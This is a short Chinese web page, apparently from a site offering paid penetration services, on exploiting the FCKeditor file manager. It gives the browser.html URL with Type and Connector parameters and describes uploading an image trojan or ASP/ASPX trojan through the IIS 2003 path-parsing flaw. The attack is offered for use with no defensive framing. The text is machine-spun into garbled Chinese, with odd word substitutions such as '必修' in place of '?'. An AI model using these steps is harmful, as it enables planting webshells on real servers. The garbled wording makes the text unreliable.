当前位置:首页 > 渗透接单 > 正文内容

fckeditor漏洞利用

访客3年前 (2022-04-21)渗透接单376

fckeditor/editor/filemanager/browser/default/browser.html必修Type=Image&Connector=connectors/asp/connector.asp

否以自界说 文献夹称号上传图片木马,应用  二00 三路径解析破绽 ,也能够间接上传ASP木马。

假如 是ASPX的便将/asp/connector.asp后缀改成ASPX

Type=Image那个变质是咱们本身 界说 的。好比 :

fckeditor/editor/filemanager/browser/default/browser.html必修Type=xiaosei&Connector=connectors/asp/connector.asp

标签: 好话题
分享给朋友:

评论列表

离鸢氿雾
2年前 (2022-12-26)

p/connector.asp否以自界说 文献夹称号上传图片木马,应用  二00 三路径解析破绽 ,也能够间接上传ASP木马。假如 是ASPX的便将/asp/connector.asp后缀改成A

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。